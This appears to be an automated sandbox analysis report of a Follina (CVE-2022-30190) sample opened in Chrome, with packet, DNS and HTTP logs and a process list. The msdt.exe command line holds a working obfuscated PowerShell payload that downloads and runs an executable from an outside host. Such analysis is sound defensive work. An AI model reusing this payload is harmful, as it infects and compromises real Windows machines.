                                                            Sep 2, 2022 13:44:45.303272009 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:45.303383112 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.356822014 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:45.357728004 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:45.357767105 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:45.359915972 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:45.360013008 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:45.365551949 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.397695065 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:45.397739887 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.398715973 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.398741007 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.398847103 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:45.399993896 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.400103092 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.480348110 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.480611086 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:46.480916977 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.480954885 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:46.481775045 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:46.481990099 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:46.482475042 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:46.482487917 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:46.537067890 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:46.537244081 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.537256002 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:46.537322044 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.551109076 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:46.551202059 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:46.551211119 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:46.551255941 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:46.557853937 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:46.557879925 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:46.558527946 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:46.558537006 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:47.856543064 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.856575012 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:47.856664896 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.868709087 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.868736982 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:47.927571058 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:47.935904980 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.935935020 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:47.937294006 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:47.937356949 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.941312075 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:47.941577911 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:48.147372961 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:48.147465944 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:57.922693968 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:57.922867060 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:44:57.922975063 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:59.333468914 CEST49741443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:44:59.333524942 CEST44349741172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.840552092 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:48.840643883 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.840753078 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:48.841257095 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:48.841281891 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.891971111 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.947191000 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:48.947251081 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.947819948 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:48.948422909 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:48.948534012 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:49.058383942 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:45:58.924508095 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:58.924648046 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:45:58.925008059 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:44.084222078 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:44.084563971 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.020622969 CEST49785443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.020781040 CEST44349785172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.021688938 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.022022963 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.022471905 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.023252964 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.023299932 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.080158949 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.080512047 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.080538034 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.080985069 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.081543922 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:48.081640959 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:48.233598948 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:46:58.100610018 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:58.100716114 CEST44349820172.217.168.36192.168.2.4
                                                            Sep 2, 2022 13:46:58.100817919 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:47:43.113172054 CEST49820443192.168.2.4172.217.168.36
                                                            Sep 2, 2022 13:47:43.113212109 CEST44349820172.217.168.36192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 2, 2022 13:44:45.275023937 CEST5223953192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:44:45.278227091 CEST5680753192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:44:45.295929909 CEST53568078.8.8.8192.168.2.4
                                                            Sep 2, 2022 13:44:45.301316977 CEST53522398.8.8.8192.168.2.4
                                                            Sep 2, 2022 13:44:47.649152040 CEST5944453192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:44:47.669023037 CEST53594448.8.8.8192.168.2.4
                                                            Sep 2, 2022 13:44:47.771469116 CEST6490653192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:44:47.789319038 CEST53649068.8.8.8192.168.2.4
                                                            Sep 2, 2022 13:45:48.566984892 CEST6300153192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:45:48.587142944 CEST53630018.8.8.8192.168.2.4
                                                            Sep 2, 2022 13:45:48.815646887 CEST6513353192.168.2.48.8.8.8
                                                            Sep 2, 2022 13:45:48.835638046 CEST53651338.8.8.8192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Sep 2, 2022 13:44:45.275023937 CEST192.168.2.48.8.8.80x32c7Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:45.278227091 CEST192.168.2.48.8.8.80x958dStandard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:47.649152040 CEST192.168.2.48.8.8.80x4111Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:47.771469116 CEST192.168.2.48.8.8.80xbc9cStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:45:48.566984892 CEST192.168.2.48.8.8.80x5c52Standard query (0)www.google.comA (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:45:48.815646887 CEST192.168.2.48.8.8.80xe61cStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Sep 2, 2022 13:44:45.295929909 CEST8.8.8.8192.168.2.40x958dNo error (0)accounts.google.com216.58.215.237A (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:45.301316977 CEST8.8.8.8192.168.2.40x32c7No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                            Sep 2, 2022 13:44:45.301316977 CEST8.8.8.8192.168.2.40x32c7No error (0)clients.l.google.com172.217.168.78A (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:47.669023037 CEST8.8.8.8192.168.2.40x4111No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:44:47.789319038 CEST8.8.8.8192.168.2.40xbc9cNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:45:48.587142944 CEST8.8.8.8192.168.2.40x5c52No error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                            Sep 2, 2022 13:45:48.835638046 CEST8.8.8.8192.168.2.40xe61cNo error (0)www.google.com172.217.168.36A (IP address)IN (0x0001)
                                                            • clients2.google.com
                                                            • accounts.google.com
                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.449738172.217.168.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2022-09-02 11:44:46 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                            Host: clients2.google.com
                                                            Connection: keep-alive
                                                            X-Goog-Update-Interactivity: fg
                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                            X-Goog-Update-Updater: chromecrx-104.0.5112.81
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                                            2022-09-02 11:44:46 UTC1INHTTP/1.1 200 OK
                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TD4NN_ydwIvASNWyt91-Ow' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 02 Sep 2022 11:44:46 GMT
                                                            Content-Type: text/xml; charset=UTF-8
                                                            X-Daynum: 5723
                                                            X-Daystart: 17086
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-XSS-Protection: 1; mode=block
                                                            Server: GSE
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                            Accept-Ranges: none
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2022-09-02 11:44:46 UTC2INData Raw: 32 63 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 37 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 31 37 30 38 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                            Data Ascii: 2ca<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5723" elapsed_seconds="17086"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                            2022-09-02 11:44:46 UTC2INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f
                                                            Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></
                                                            2022-09-02 11:44:46 UTC2INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.449737216.58.215.237443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2022-09-02 11:44:46 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                            Host: accounts.google.com
                                                            Connection: keep-alive
                                                            Content-Length: 1
                                                            Origin: https://www.google.com
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: empty
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                                            2022-09-02 11:44:46 UTC1OUTData Raw: 20
                                                            Data Ascii:
                                                            2022-09-02 11:44:46 UTC2INHTTP/1.1 200 OK
                                                            Content-Type: application/json; charset=utf-8
                                                            Access-Control-Allow-Origin: https://www.google.com
                                                            Access-Control-Allow-Credentials: true
                                                            X-Content-Type-Options: nosniff
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Fri, 02 Sep 2022 11:44:46 GMT
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                            Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]}
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bQD7X8QFLUFqck_EcSD02Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                                                            Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp"
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Server: ESF
                                                            X-XSS-Protection: 0
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                            Accept-Ranges: none
                                                            Vary: Accept-Encoding
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2022-09-02 11:44:46 UTC4INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                            Data Ascii: 11["gaia.l.a.r",[]]
                                                            2022-09-02 11:44:46 UTC4INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:13:44:39
                                                            Start date:02/09/2022
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                            Imagebase:0x7ff683680000
                                                            File size:2851656 bytes
                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:1
                                                            Start time:13:44:42
                                                            Start date:02/09/2022
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8
                                                            Imagebase:0x7ff683680000
                                                            File size:2851656 bytes
                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:2
                                                            Start time:13:44:43
                                                            Start date:02/09/2022
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
                                                            Imagebase:0x7ff683680000
                                                            File size:2851656 bytes
                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:5
                                                            Start time:13:45:14
                                                            Start date:02/09/2022
                                                            Path:C:\Windows\System32\msdt.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
                                                            Imagebase:0x7ff6ef550000
                                                            File size:1560576 bytes
                                                            MD5 hash:8BE43BAF1F37DA5AB31A53CA1C07EE0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            No disassembly